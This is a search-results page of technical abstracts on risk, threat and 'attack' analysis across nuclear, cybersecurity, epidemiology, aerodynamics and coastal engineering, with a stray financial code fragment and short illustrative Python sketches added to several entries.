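def npv(cash_flows, rate):
    """Net present value of yearly cash flows (index 0 = year 0)."""
    return sum(cf / (1.0 + rate) ** t for t, cf in enumerate(cash_flows))

def levelized_cost(cost_flows, throughput_flows, rate):
    """Levelized unit cost: discounted costs divided by discounted throughput
    (e.g. dollars per tonne of heavy metal placed in storage)."""
    return npv(cost_flows, rate) / npv(throughput_flows, rate)

# Illustrative 5-year dry-storage example: capital in year 0, O&M afterwards
costs = [120e6, 8e6, 8e6, 8e6, 8e6]       # dollars per year
fuel = [0, 200, 200, 200, 200]            # tonnes of heavy metal received per year
rate = 0.05                               # illustrative discount rate
print(f"NPV of costs: ${npv(costs, rate)/1e6:.1f} M")
print(f"levelized cost: ${levelized_cost(costs, fuel, rate):,.0f} per tHM")
```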

  17. RAMS (Risk Analysis - Modular System) methodology

    Energy Technology Data Exchange (ETDEWEB)

    Stenner, R.D.; Strenge, D.L.; Buck, J.W. [and others]

    1996-10-01

    The Risk Analysis - Modular System (RAMS) was developed to serve as a broad scope risk analysis tool for the Risk Assessment of the Hanford Mission (RAHM) studies. The RAHM element provides risk analysis support for Hanford Strategic Analysis and Mission Planning activities. The RAHM also provides risk analysis support for the Hanford 10-Year Plan development activities. The RAMS tool draws from a collection of specifically designed databases and modular risk analysis methodologies and models. RAMS is a flexible modular system that can be focused on targeted risk analysis needs. It is specifically designed to address risks associated with overall strategy, technical alternative, and 'what if' questions regarding the Hanford cleanup mission. RAMS is set up to address both near-term and long-term risk issues. Consistency is very important for any comparative risk analysis, and RAMS is designed to efficiently and consistently compare risks and produce risk reduction estimates. There is a wide range of output information that can be generated by RAMS. These outputs can be detailed by individual contaminants, waste forms, transport pathways, exposure scenarios, individuals, populations, etc. However, they can also be in rolled-up form to support high-level strategy decisions.

  18. Analysis of techniques of sample attack for soil and mineral analysis

    International Nuclear Information System (INIS)

    Dean, J.R.; Chiu, N.W.

    1985-05-01

    Four methods of sample attack were evaluated in the laboratory for use in the determination of uranium, radium-226, thorium-232, thorium-230, thorium-228, and lead-210. The methods evaluated were (1) KF/pyrosulfate fusion; (2) Sodium carbonate fusion; (3) Nitric, perchloric, hydrofluoric acid digestion; and, (4) combination nitric, perchloric, hydrofluoric acid/pyrosulfate fusion. Five samples were chosen for evaluation; two were mine tailings from Bancroft, Ontario and Beaverlodge, Saskatchewan, one was a synthetic uranium ore-silica mixture and two were soil samples supplied by AECB. The KF/pyrosulfate dissolution procedure was found to be the fastest and, overall, most accurate dissolution method for the analysis of 1-20 samples. For larger numbers of samples the three acid/pyrosulfate fusion combination was shown to have some merit

  19. Environmental impact statement analysis: dose methodology

    International Nuclear Information System (INIS)

    Mueller, M.A.; Strenge, D.L.; Napier, B.A.

    1981-01-01

    Standardized sections and methodologies are being developed for use in environmental impact statements (EIS) for activities to be conducted on the Hanford Reservation. Five areas for standardization have been identified: routine operations dose methodologies, accident dose methodology, Hanford Site description, health effects methodology, and socioeconomic environment for Hanford waste management activities

  20. AR.Drone: security threat analysis and exemplary attack to track persons

    Science.gov (United States)

    Samland, Fred; Fruth, Jana; Hildebrandt, Mario; Hoppe, Tobias; Dittmann, Jana

    2012-01-01

    In this article we illustrate an approach to a security threat analysis of the quadrocopter AR.Drone, a toy for augmented reality (AR) games. The technical properties of the drone can be misused for attacks which may affect security and/or privacy. Our aim is to raise awareness of possible misuse and to motivate the implementation of improved security mechanisms for the quadrocopter. We focus primarily on obvious security vulnerabilities of this quadrocopter (e.g. communication over unencrypted WLAN, usage of UDP, live video streaming via unencrypted WLAN to the control device). We could practically verify in three exemplary scenarios that these can be misused by unauthorized persons for several attacks: hijacking of the drone, eavesdropping on the AR.Drone's unprotected video streams, and the tracking of persons. Amongst other aspects, our current research focuses on the realization of the attack of tracking persons and objects with the drone. Besides the realization of attacks, we want to evaluate the potential of this particular drone for a "safe-landing" function, as well as potential security enhancements. Additionally, in the future we plan to investigate automatic tracking of persons or objects without the need for human interaction.

  1. Security and Risk Analysis of Nuclear Safeguards Instruments Using Attack Trees

    International Nuclear Information System (INIS)

    Naumann, I.; Wishard, B.

    2015-01-01

    The IAEA's nuclear safeguards instruments must be frequently evaluated against attack vectors, which are extremely varied and, at first approximation, may seem inconsequential, but are not. Accurately analyzing the impact of attacks on a multi-component system requires a highly structured and well-documented assessment. Tree structures, such as fault trees, have long been used to assess the consequences of selecting potential solutions and their impact on risk. When applied to security threats by introducing threat agents (adversaries) and vulnerabilities, this approach can be extremely valuable in uncovering previously unidentified risks and identifying mitigation steps. This paper discusses how attack trees can be used for the security analysis of nuclear safeguards instruments. The root node of such a tree represents an objective that negatively impacts security, such as disclosing and/or falsifying instrument data or circumventing safeguards methods. Usually, this objective is rather complex, and attaining it requires a combination of several security breaches, which may vary in how much funding or what capabilities are required to execute them. Thus, it is necessary to break the root objective into smaller, less complex units. Once a leaf node describes a reasonably comprehensible action, it is the security experts' task to allocate levels of difficulty and funding to this node. Eventually, the paths from the leaf nodes to the root node describe all possible combinations of actions necessary to carry out a successful attack. The use of a well-structured attack tree helps the developer think like the adversary, providing more effective security solutions. (author)
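
    A minimal sketch of the bottom-up evaluation described above: leaves carry attacker-cost estimates, OR nodes take the cheapest child and AND nodes sum their children, so the root yields the cheapest complete attack. The tree structure, the aggregation rule, and the cost figures below are hypothetical, not taken from the paper.

```python
from dataclasses import dataclass, field
from typing import List, Optional

@dataclass
class Node:
    name: str
    gate: Optional[str] = None            # "AND", "OR", or None for a leaf
    cost: float = 0.0                     # attacker cost estimate for leaves
    children: List["Node"] = field(default_factory=list)

def min_attack_cost(node: Node) -> float:
    """Bottom-up evaluation: OR = cheapest child, AND = sum of children."""
    if not node.children:
        return node.cost
    child_costs = [min_attack_cost(c) for c in node.children]
    return min(child_costs) if node.gate == "OR" else sum(child_costs)

# Hypothetical attack tree for the objective "falsify instrument data"
tree = Node("falsify data", "OR", children=[
    Node("tamper in transit", "AND", children=[
        Node("access cabling", cost=20_000),
        Node("break authentication", cost=150_000),
    ]),
    Node("corrupt at source", "AND", children=[
        Node("insider access", cost=60_000),
        Node("modify firmware", cost=40_000),
    ]),
])
print(f"cheapest attack path costs about ${min_attack_cost(tree):,.0f}")
```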

  2. Analysis of Windward Side Hypersonic Boundary Layer Transition on Blunted Cones at Angle of Attack

    Science.gov (United States)

    2017-01-09

    … correlated with PSE/LST N-factors. Subject terms: boundary layer transition, hypersonic, ground test. Nomenclature fragments: …Maccoll solution; e, condition at boundary layer edge; w, condition at wall, viscous; ∞, condition in freestream; LST, Linear Stability Theory; PSE… Report AFRL-RQ-WP-TP-2017-0169, "Analysis of Windward Side Hypersonic Boundary Layer Transition on Blunted Cones at Angle of Attack".

  3. Studying creativity training programs: A methodological analysis

    DEFF Research Database (Denmark)

    Valgeirsdóttir, Dagný; Onarheim, Balder

    2017-01-01

    Throughout decades of creativity research, a range of creativity training programs have been developed, tested, and analyzed. In 2004 Scott and colleagues published a meta-analysis of all creativity training programs to date, and the review presented here set out to identify and analyze studies published since that seminal 2004 review. Focusing on quantitative studies of creativity training programs for adults, our systematic review resulted in 22 publications. All studies were analyzed, but comparing the reported effectiveness of training across studies proved difficult due to methodological inconsistencies, variations in the reporting of results, as well as the types of measures used. Thus a consensus for future studies is called for to answer the question: Which elements make one creativity training program more effective than another? This is a question of equal relevance to academia and industry...

  4. Methodologies for risk analysis in slope instability

    International Nuclear Information System (INIS)

    Bernabeu Garcia, M.; Diaz Torres, J. A.

    2014-01-01

    This paper is an overview of the different methodologies used in producing landslide risk maps, intended to give the reader a basic knowledge of how to proceed in their development. Landslide hazard maps are increasingly demanded by governments because, due to climate change, deforestation and the pressure exerted by the growth of urban centers, the damage caused by natural phenomena is increasing each year, making this area of work a field of study of growing importance. To explain the mapping process, a journey through each of its phases is made: from the study of the types of slope movements and the necessary management of geographic information systems (GIS) and inventories, to the analysis of landslide susceptibility, threat, vulnerability and risk. (Author)

  5. Attack rates assessment of the 2009 pandemic H1N1 influenza A in children and their contacts: a systematic review and meta-analysis.

    Directory of Open Access Journals (Sweden)

    Aharona Glatman-Freedman

    Full Text Available BACKGROUND: The recent H1N1 influenza A pandemic was marked by multiple reports of illness and hospitalization in children, suggesting that children may have played a major role in the propagation of the virus. A comprehensive, detailed analysis of the attack rates among children as compared with their contacts in various settings is of great importance for understanding their unique role in influenza pandemics. METHODOLOGY/PRINCIPAL FINDINGS: We searched MEDLINE (PubMed) and Embase for published studies reporting outbreak investigations with direct measurements of attack rates of the 2009 pandemic H1N1 influenza A among children, and quantified how these compare with those of their contacts. We identified 50 articles suitable for review, which reported on school, household, travel and social-event settings. The selected reports and our meta-analysis indicated that children had significantly higher attack rates than adults, and that this phenomenon was observed for both virologically confirmed and clinical cases, in various settings and locations around the world. The review also provided insight into some characteristics of transmission between children and their contacts in the various settings. CONCLUSION/SIGNIFICANCE: The consistently higher attack rates of the 2009 pandemic H1N1 influenza A among children, as compared to adults, as well as the magnitude of the difference, are important for understanding the contribution of children to the disease burden, for the implementation of mitigation strategies directed towards children, and for more precise mathematical modeling and simulation of future influenza pandemics.

  6. Use of Attack Graphs in Security Systems

    Directory of Open Access Journals (Sweden)

    Vivek Shandilya

    2014-01-01

    Full Text Available Attack graphs have been used to model the vulnerabilities of systems and their potential exploits. The successful exploits leading to partial or total failure of a system are a subject of keen security interest. Considerable effort has been expended in exhaustive modeling, analysis, detection, and mitigation of attacks. One prominent methodology involves constructing attack graphs of the pertinent system for analysis and response strategies. This not only gives a simplified representation of the system, but also allows prioritizing the security properties whose violations are of greater concern, for both detection and repair. We present a survey and critical study of state-of-the-art technologies in attack graph generation and their use in security systems. Based on our research, we identify the potential, challenges, and direction of current research in using attack graphs.

  7. Cyber Security Analysis by Attack Trees for a Reactor Protection System

    International Nuclear Information System (INIS)

    Park, Gee-Yong; Lee, Cheol Kwon; Choi, Jong Gyun; Kim, Dong Hoon; Lee, Young Jun; Kwon, Kee-Choon

    2008-01-01

    As nuclear facilities introduce digital systems, cyber security becomes an emerging topic to be analyzed and resolved. Domestic and foreign regulatory bodies have taken note of this topic and are preparing appropriate guidance. The nuclear industry, where new construction or upgrades of I and C systems are planned, is analyzing and establishing cyber security programs. A risk-based analysis for cyber security has been performed in the KNICS (Korea Nuclear I and C Systems) project, where the cyber security analysis has been applied to a reactor protection system (RPS). In this paper, a cyber security analysis based on attack trees is proposed for the KNICS RPS.

  8. Stability Analysis of Hypersonic Boundary Layer over a Cone at Small Angle of Attack

    Directory of Open Access Journals (Sweden)

    Feng Ji

    2014-04-01

    Full Text Available An investigation of the stability of the hypersonic boundary layer over a cone at a small angle of attack has been performed. After obtaining the steady base flow, linear stability theory (LST) analysis was carried out under the local parallel-flow assumption. The growth rates of the first-mode and second-mode waves at different streamwise locations and azimuthal angles were obtained. The results show that boundary layer stability is greatly influenced by small angles of attack. The maximum growth rate of the most unstable wave on the leeward side is larger than that on the windward side. Moreover, the dominant second-mode wave appears earlier on the leeward side than on the windward side. The LST results also show that there is a “valley” region around the 120°~150° meridian in the curve of maximum growth rates.

  9. Analysis Of Default Passwords In Routers Against Brute-Force Attack

    Directory of Open Access Journals (Sweden)

    Mohammed Farik

    2015-08-01

    Full Text Available Password authentication is the main means of access control on network routers, and router manufacturers provide a default password for initial login to the router. While there have been many publications regarding the minimum requirements of a good password, how widely the manufacturers themselves adhere to those minimum standards, and whether their default passwords can withstand brute-force attack, are not widely known. The novelty of this research is that this is the first time default passwords have been analyzed and documented from such a large variety of router models to reveal password strengths or weaknesses against brute-force attacks. First, the individual default router password of each model was collected, tabulated and tested using a password strength meter for entropy. Then descriptive statistical analysis was performed on the tabulated data. The analysis revealed quantitatively how strong or weak default passwords are against brute-force attacks. The results of this research give router security researchers, router manufacturers and router administrators a useful guide on the strengths and weaknesses of passwords that follow similar patterns.
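    As an illustration of the kind of entropy and brute-force estimates described above (not the authors' tool), the sketch below approximates a password's entropy from the character classes it uses and converts that into a worst-case exhaustive-search time; the guess rate is an assumed figure, and the example passwords are made up.

```python
import math
import string

# Rough password entropy estimate: bits = length * log2(pool size),
# where the pool is the union of character classes the password draws from.
def estimate_entropy_bits(password: str) -> float:
    pool = 0
    if any(c in string.ascii_lowercase for c in password):
        pool += 26
    if any(c in string.ascii_uppercase for c in password):
        pool += 26
    if any(c in string.digits for c in password):
        pool += 10
    if any(c in string.punctuation for c in password):
        pool += len(string.punctuation)
    return len(password) * math.log2(pool) if pool else 0.0

def brute_force_seconds(bits: float, guesses_per_second: float = 1e9) -> float:
    """Worst-case exhaustive-search time for an assumed guess rate."""
    return 2 ** bits / guesses_per_second

for pwd in ["admin", "1234", "Adm1n!2020"]:   # hypothetical defaults
    bits = estimate_entropy_bits(pwd)
    print(f"{pwd!r}: ~{bits:.1f} bits, "
          f"<= {brute_force_seconds(bits):.2e} s at 1e9 guesses/s")
```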

  10. Setting Component Priorities in Protecting NPPs against Cyber-Attacks Using Reliability Analysis Techniques

    International Nuclear Information System (INIS)

    Choi, Moon Kyoung; Seong, Poong Hyun; Son, Han Seong

    2017-01-01

    The digitalization of infrastructure makes systems vulnerable to cyber threats and hybrid attacks. According to ICS-CERT reports, the number of vulnerabilities in ICS industries is increasing rapidly over time. Digital I and C systems have been developed and installed in nuclear power plants, and due to the installation of these digital I and C systems, cyber security concerns are increasing in the nuclear industry. However, there are too many critical digital assets to be inspected in digitalized NPPs. In order to reduce the inefficiency of regulation in nuclear facilities, the critical components that are directly related to an accident are elicited by using reliability analysis techniques. Target initiating events are selected, and their headings are analyzed through event tree analysis to determine whether they can be affected by cyber-attacks. Among the headings, those whose failure under a cyber-attack can proceed directly to core damage are finally selected as the target for deriving the minimal cut sets. We analyze the fault trees and derive the minimal cut sets. In the original PSA, the probability value of the cut sets is important, but that probability is not important in terms of the cyber security of NPPs. The important factor is the number of basic events constituting the minimal cut sets, which is proportional to the vulnerability.
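    For readers unfamiliar with minimal cut sets, the sketch below (an illustration, not the paper's analysis) derives them from a tiny, invented fault tree: OR gates union their children's cut sets, AND gates combine one cut set from each child, and non-minimal supersets are pruned at the end. The gate structure and basic-event names are hypothetical.

```python
from itertools import product

# Fault-tree nodes: a basic event is a string; a gate is ("AND"/"OR", [children]).
def cut_sets(node):
    if isinstance(node, str):
        return {frozenset([node])}
    gate, children = node
    child_sets = [cut_sets(c) for c in children]
    if gate == "OR":
        return set().union(*child_sets)
    # AND: every combination of one cut set per child, merged together
    return {frozenset().union(*combo) for combo in product(*child_sets)}

def minimal_cut_sets(node):
    sets_ = cut_sets(node)
    return {s for s in sets_ if not any(t < s for t in sets_)}  # drop supersets

# Hypothetical "core damage" top event, for illustration only.
top = ("AND", [
    ("OR", ["loss_of_feedwater", "cyber_trip_of_pumps"]),
    ("OR", ["rps_failure", ("AND", ["diesel_A_fail", "diesel_B_fail"])]),
])

for mcs in sorted(minimal_cut_sets(top), key=len):
    print(sorted(mcs))
```

    Counting how many basic events appear in each resulting set is then a direct way to rank cut sets by the kind of vulnerability measure the abstract describes.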

  11. Performance analysis of chaotic and white watermarks in the presence of common watermark attacks

    Energy Technology Data Exchange (ETDEWEB)

    Mooney, Aidan [Department of Computer Science, NUI Maynooth, Co. Kildare (Ireland)], E-mail: amooney@cs.nuim.ie; Keating, John G. [Department of Computer Science, NUI Maynooth, Co. Kildare (Ireland)], E-mail: john.keating@nuim.ie; Heffernan, Daniel M. [Department of Mathematical Physics, NUI Maynooth, Co. Kildare (Ireland); School of Theoretical Physics, Dublin Institute for Advanced Studies, Dublin 4 (Ireland)], E-mail: dmh@thphys.nuim.ie

    2009-10-15

    Digital watermarking is a technique that aims to embed a piece of information permanently into some digital media, which may be used at a later stage to prove owner authentication and to help protect documents. The most common watermark types used to date are pseudorandom number sequences, which possess a white spectrum. Chaotic watermark sequences have been receiving increasing interest recently and have been shown to be an alternative to the pseudorandom watermark types. In this paper the performance of pseudorandom watermarks and chaotic watermarks in the presence of common watermark attacks is analysed. The chaotic watermarks are generated from the iteration of the skew tent map, the Bernoulli map and the logistic map. The analysis focuses on the watermarked images after they have been subjected to common image distortion attacks. The capacities of each of these images are also calculated. It is shown that watermarks generated from lowpass chaotic signals have superior performance over the other signal types analysed for the attacks studied.
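    For readers unfamiliar with the chaotic generators named above, here is a small illustrative sketch (not the authors' code) that iterates the logistic map and the skew tent map and thresholds the orbits into bipolar watermark sequences; the seeds, parameters and sequence length are arbitrary choices.

```python
import numpy as np

def logistic_sequence(n, x0=0.37, r=4.0):
    """Iterate the logistic map x_{k+1} = r * x_k * (1 - x_k)."""
    x, out = x0, np.empty(n)
    for k in range(n):
        x = r * x * (1.0 - x)
        out[k] = x
    return out

def skew_tent_sequence(n, x0=0.21, a=0.63):
    """Iterate the skew tent map: x/a for x < a, else (1 - x) / (1 - a)."""
    x, out = x0, np.empty(n)
    for k in range(n):
        x = x / a if x < a else (1.0 - x) / (1.0 - a)
        out[k] = x
    return out

def to_bipolar_watermark(orbit):
    """Threshold a chaotic orbit about its median into a +/-1 watermark."""
    return np.where(orbit >= np.median(orbit), 1.0, -1.0)

w_logistic = to_bipolar_watermark(logistic_sequence(1024))
w_tent = to_bipolar_watermark(skew_tent_sequence(1024))
print(w_logistic[:16], w_tent[:16])
```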

  12. Dynamic Analysis of the Evolution of Cereus peruvianus (Cactaceae Areas Attacked by Phoma sp.

    Directory of Open Access Journals (Sweden)

    Gyorgy FESZT

    2009-12-01

    Full Text Available Cereus peruvianus (night-blooming cereus, or Peruvian apple) is one of the species sensitive to Phoma attack. Photographic images can capture a given phytopathology at a given moment, and the computerized analysis of such an image quantifies the spread that the phytopathological process has at that moment. The purpose of this study is to develop the technique of acquiring successions of digital photos of Cereus peruvianus f. monstruosa attacked by Phoma sp. In parallel with recording the images, data on the greenhouse microclimate (minimum and maximum air humidity, minimum and maximum temperature) were recorded with a Rhythm digital temperature and humidity controller. In the first stage of the study, the attack showed small fluctuations, reaching a high level on days with low temperatures. The most significant growths were recorded in the periods 10.02.2005-20.02.2005, with an increase in affected area of 10.97 - 8.82 = 2.15, and 11.03.2005-22.04.2005, with a growth difference of 14.67 - 13.32 = 1.35. Generally, the affected areas grow on days with low minimum temperatures. The great advantage of this technique is the possibility of using it in situ in the home areas of species or on crop plants in the field. Repeated images, acquired over time and then overlaid, can provide important data on the evolution of the affected areas.

  13. A Review of Citation Analysis Methodologies for Collection Management

    Science.gov (United States)

    Hoffmann, Kristin; Doucette, Lise

    2012-01-01

    While there is a considerable body of literature that presents the results of citation analysis studies, most researchers do not provide enough detail in their methodology to reproduce the study, nor do they provide rationale for methodological decisions. In this paper, we review the methodologies used in 34 recent articles that present a…

  14. Clean Energy Manufacturing Analysis Center Benchmark Report: Framework and Methodologies

    Energy Technology Data Exchange (ETDEWEB)

    Sandor, Debra [National Renewable Energy Lab. (NREL), Golden, CO (United States); Chung, Donald [National Renewable Energy Lab. (NREL), Golden, CO (United States); Keyser, David [National Renewable Energy Lab. (NREL), Golden, CO (United States); Mann, Margaret [National Renewable Energy Lab. (NREL), Golden, CO (United States); Engel-Cox, Jill [National Renewable Energy Lab. (NREL), Golden, CO (United States)

    2017-05-23

    This report documents the CEMAC methodologies for developing and reporting annual global clean energy manufacturing benchmarks. The report reviews previously published manufacturing benchmark reports and foundational data, establishes a framework for benchmarking clean energy technologies, describes the CEMAC benchmark analysis methodologies, and describes the application of the methodologies to the manufacturing of four specific clean energy technologies.

  15. Practical In-Depth Analysis of IDS Alerts for Tracing and Identifying Potential Attackers on Darknet

    Directory of Open Access Journals (Sweden)

    Jungsuk Song

    2017-02-01

    Full Text Available The darknet (i.e., a set of unused IP addresses is a very useful solution for observing the global trends of cyber threats and analyzing attack activities on the Internet. Since the darknet is not connected with real systems, in most cases, the incoming packets on the darknet (‘the darknet traffic’ do not contain a payload. This means that we are unable to get real malware from the darknet traffic. This situation makes it difficult for security experts (e.g., academic researchers, engineers, operators, etc. to identify whether the source hosts of the darknet traffic are infected by real malware or not. In this paper, we present the overall procedure of the in-depth analysis between the darknet traffic and IDS alerts using real data collected at the Science and Technology Cyber Security Center (S&T CSC in Korea and provide the detailed in-depth analysis results. The ultimate goal of this paper is to provide practical experience, insight and know-how to security experts so that they are able to identify and trace the root cause of the darknet traffic. The experimental results show that correlation analysis between the darknet traffic and IDS alerts is very useful to discover potential attack hosts, especially internal hosts, and to find out what kinds of malware infected them.
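    A toy sketch of the kind of correlation described above is given below: it simply intersects the source addresses seen in darknet flow records with those raised in IDS alerts to flag candidate infected hosts. The file formats, field names and noise threshold are assumptions for illustration, not the paper's actual pipeline.

```python
import csv
from collections import Counter

def load_sources(path, column):
    """Read one CSV column of source IP addresses into a Counter."""
    with open(path, newline="") as f:
        return Counter(row[column] for row in csv.DictReader(f))

# Hypothetical input files: darknet flow records and an IDS alert export.
darknet = load_sources("darknet_flows.csv", "src_ip")
alerts = load_sources("ids_alerts.csv", "src_ip")

# Hosts that both probe the darknet and trigger IDS signatures are the
# strongest candidates for being malware-infected.
suspects = {
    ip: (darknet[ip], alerts[ip])
    for ip in darknet.keys() & alerts.keys()
    if darknet[ip] >= 10          # assumed noise threshold
}
for ip, (flows, hits) in sorted(suspects.items(), key=lambda kv: -kv[1][0]):
    print(f"{ip}: {flows} darknet packets, {hits} IDS alerts")
```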

  16. Attacking and defensive styles of play in soccer: analysis of Spanish and English elite teams.

    Science.gov (United States)

    Fernandez-Navarro, Javier; Fradua, Luis; Zubillaga, Asier; Ford, Paul R; McRobert, Allistair P

    2016-12-01

    The aim of this study was to define and categorise different styles of play in elite soccer and associated performance indicators by using factor analysis. Furthermore, the observed teams were categorised using all factor scores. Data were collected from 97 matches from the Spanish La Liga and the English Premier League from the seasons 2006-2007 and 2010-2011 using the Amisco® system. A total of 19 performance indicators, 14 describing aspects of attacking play and five describing aspects of defensive play, were included in the factor analysis. Six factors, representing 12 different styles of play (eight attacking and four defensive), had eigenvalues greater than 1 and explained 87.54% of the total variance. Direct and possession styles of play, defined by factor 1, were the most apparent styles. Factor analysis used the performance indicators to cluster each team's style of play. Findings showed that a team's style of play was defined by specific performance indicators and, consequently, teams can be classified to create a playing style profile. For practical implications, playing styles profiling can be used to compare different teams and prepare for opponents in competition. Moreover, teams could use specific training drills directed to improve their styles of play.

  17. Vulnerability of advanced encryption standard algorithm to differential power analysis attacks implemented on ATmega-128 microcontroller

    CSIR Research Space (South Africa)

    Mpalane, Kealeboga

    2016-09-01

    Full Text Available A wide variety of cryptographic embedded devices, including smartcards, ASICs and FPGAs, must be secured against break-ins. However, these devices are vulnerable to side channel attacks. A side channel attack uses physical attributes...

  18. A retrospective analysis of practice patterns in the management of acute asthma attack across Turkey.

    Science.gov (United States)

    Türktaş, Haluk; Bavbek, Sevim; Misirligil, Zeynep; Gemicioğlu, Bilun; Mungan, Dilşad

    2010-12-01

    To evaluate patient characteristics and practice patterns in the management of acute asthma attack at tertiary care centers across Turkey. A total of 294 patients (mean age: 50.4 ± 15.1 years; females: 80.3%) diagnosed with persistent asthma were included in this retrospective study upon their admission to the hospital with an acute asthma attack. Patient demographics, asthma control level, asthma attack severity and the management of the attack were evaluated. Gender had no influence on asthma control or attack severity. In 57.5% of the patients, the asthma attack was moderate. Most patients (78.9%) were hospitalized, with longer durations evident for severe attacks. Spirometry and chest X-ray were the most frequent tests (85.4%), while steroids (72.0% parenteral; 29.0% oral) and short-acting beta-agonists (SABA) + anticholinergics (45.5%) were the main drugs of choice in attack management. Attack severity and pre-attack asthma control level were significantly correlated, and pre-attack asthma was uncontrolled in 42.6% of the patients with a severe attack. Most of the patients were on a combination of more than one controller drug (two in 38.7% and 3-4 in 31.2%) before the attack. Providing country-specific data on practice patterns in the management of acute asthma attack in a representative cohort in Turkey, the prescription of steroids and SABA + anticholinergics as the main drugs of choice was in line with guidelines, while the significant relation of pre-attack asthma control to the risk/severity of the asthma attack and the rate/duration of hospitalization seems to be the leading result of the present study. Copyright © 2010 Elsevier Ltd. All rights reserved.

  19. Timing Analysis of SSL/TLS Man in the Middle Attacks

    OpenAIRE

    Benton, Kevin; Bross, Ty

    2013-01-01

    Man in the middle attacks are a significant threat to modern e-commerce and online communications, even when such transactions are protected by TLS. We intend to show that it is possible to detect man-in-the-middle attacks on SSL and TLS by detecting timing differences between a standard SSL session and an attack we created.
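    The measurement itself can be as simple as timing repeated handshakes. Below is a hedged sketch (not the authors' tool) that records TCP-connect-plus-TLS-handshake latency to a host so that a baseline distribution can later be compared against sessions suspected of being proxied by a man in the middle; the host name and sample count are placeholders.

```python
import socket
import ssl
import statistics
import time

def handshake_seconds(host: str, port: int = 443, timeout: float = 5.0) -> float:
    """Time one TCP connect plus TLS handshake (both are included)."""
    ctx = ssl.create_default_context()
    start = time.perf_counter()
    with socket.create_connection((host, port), timeout=timeout) as raw:
        with ctx.wrap_socket(raw, server_hostname=host):
            pass  # handshake completes inside wrap_socket
    return time.perf_counter() - start

def sample(host: str, n: int = 20):
    times = [handshake_seconds(host) for _ in range(n)]
    return statistics.mean(times), statistics.stdev(times)

if __name__ == "__main__":
    mean_t, sd_t = sample("example.com")   # placeholder host
    print(f"baseline handshake: {mean_t*1000:.1f} ms +/- {sd_t*1000:.1f} ms")
    # A later session whose handshake time deviates far from this baseline
    # (e.g., by several standard deviations) would warrant MitM suspicion.
```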

  20. A Stochastic Framework for Quantitative Analysis of Attack-Defense Trees

    NARCIS (Netherlands)

    Jhawar, Ravi; Lounis, Karim; Mauw, Sjouke

    2016-01-01

    Cyber attacks are becoming increasingly complex, sophisticated and organized. Losses due to such attacks can be significant, ranging from monetary loss to damage to business reputation. Therefore, there is a great need for potential victims of cyber attacks to deploy security solutions

  1. Methodology for Mode Selection in Corridor Analysis of Freight Transportation

    OpenAIRE

    Kanafani, Adib

    1984-01-01

    The purpose of this report is to outline a methodology for the analysis of mode selection in freight transportation. This methodology is intended to be part of transportation corridor analysis, a component of demand analysis that is part of a national transportation planning process. The methodological framework presented here provides a basis on which specific models and calculation procedures might be developed. It also provides a basis for the development of a data management system suitable for co...

  2. Kinematic Analysis of Volleyball Attack in the Net Center with Various Types of Take-Off.

    Science.gov (United States)

    Zahálka, František; Malý, Tomáš; Malá, Lucia; Ejem, Miloslav; Zawartka, Marek

    2017-09-01

    The aim of the study was to describe and compare the kinematics of two types of attack-hit execution: the goofy approach and the regular approach. The research group consisted of players from the Czech Republic's top league (n = 12, age 28.0 ± 4.3 years, body height 196.6 ± 5.6 cm, body mass 89.7 ± 6.7 kg), divided into two groups according to the individual type of approach in the attack. Analysis of movement was performed by 3D kinematic video analysis; space coordinates were calculated by the DLT (Direct Linear Transformation) method together with the interpretation software TEMA Bio 2.3 (Image Systems AB, Sweden). The players started their run-up from a distance of about 4-4.5 m from the net with similar maximal vertical velocity (2.91-2.96 m·s⁻¹). The trajectory of players with the goofy approach seemed to be convenient for the rotation of the shoulders and hips at the moment of ball contact. Differences between the two groups were observed: players with a goofy approach had a longer flight phase compared to regularly approaching players.

  3. Risk analysis of breakwater caisson under wave attack using load surface approximation

    Science.gov (United States)

    Kim, Dong Hyawn

    2014-12-01

    A new load surface based approach to the reliability analysis of caisson-type breakwater is proposed. Uncertainties of the horizontal and vertical wave loads acting on breakwater are considered by using the so-called load surfaces, which can be estimated as functions of wave height, water level, and so on. Then, the first-order reliability method (FORM) can be applied to determine the probability of failure under the wave action. In this way, the reliability analysis of breakwaters with uncertainties both in wave height and in water level is possible. Moreover, the uncertainty in wave breaking can be taken into account by considering a random variable for wave height ratio which relates the significant wave height to the maximum wave height. The proposed approach is applied numerically to the reliability analysis of caisson breakwater under wave attack that may undergo partial or full wave breaking.
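    To illustrate the FORM step under strong simplifying assumptions (independent normal wave height and water level, a hypothetical limit state built from an invented load surface, no wave-breaking variable), the sketch below runs the standard Hasofer-Lind/Rackwitz-Fiessler iteration with numerical gradients; all names and figures (MEANS, STDS, RESISTANCE, load_surface) are placeholders and this is not the paper's model.

```python
import math
import numpy as np

# Simplified limit state g = resistance - load_surface(H, zeta); failure when g < 0.
# Random variables (assumed independent normal): wave height H, water level zeta.
MEANS = np.array([5.0, 1.0])     # m (hypothetical)
STDS = np.array([0.8, 0.3])      # m (hypothetical)
RESISTANCE = 550.0               # kN/m, hypothetical sliding resistance

def load_surface(h, zeta):
    """Hypothetical horizontal wave load as a smooth function of H and zeta."""
    return 60.0 * h + 45.0 * zeta + 8.0 * h * zeta

def g_of_u(u):
    """Limit state in standard-normal space (x = mu + sigma * u)."""
    h, zeta = MEANS + STDS * u
    return RESISTANCE - load_surface(h, zeta)

def form_beta(g, n=2, tol=1e-8, max_iter=100, eps=1e-6):
    """Hasofer-Lind/Rackwitz-Fiessler iteration with finite-difference gradients."""
    u = np.zeros(n)
    for _ in range(max_iter):
        g0 = g(u)
        grad = np.array([(g(u + eps * e) - g0) / eps for e in np.eye(n)])
        u_new = (grad @ u - g0) / (grad @ grad) * grad
        if np.linalg.norm(u_new - u) < tol:
            u = u_new
            break
        u = u_new
    return np.linalg.norm(u)

beta = form_beta(g_of_u)
pf = 0.5 * math.erfc(beta / math.sqrt(2))   # Phi(-beta)
print(f"reliability index beta = {beta:.3f}, failure probability = {pf:.3e}")
```

    In a fuller treatment the load surface would be fitted from hydraulic data, non-normal variables would be mapped to standard normal space, and a wave height ratio variable would represent breaking, as the abstract describes.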

  4. Cyber Security Analysis by Attack Trees for a Reactor Protection System

    Energy Technology Data Exchange (ETDEWEB)

    Park, Gee-Yong; Lee, Cheol Kwon; Choi, Jong Gyun; Kim, Dong Hoon; Lee, Young Jun; Kwon, Kee-Choon [Korea Atomic Energy Research Institute, Daejeon (Korea, Republic of)

    2008-10-15

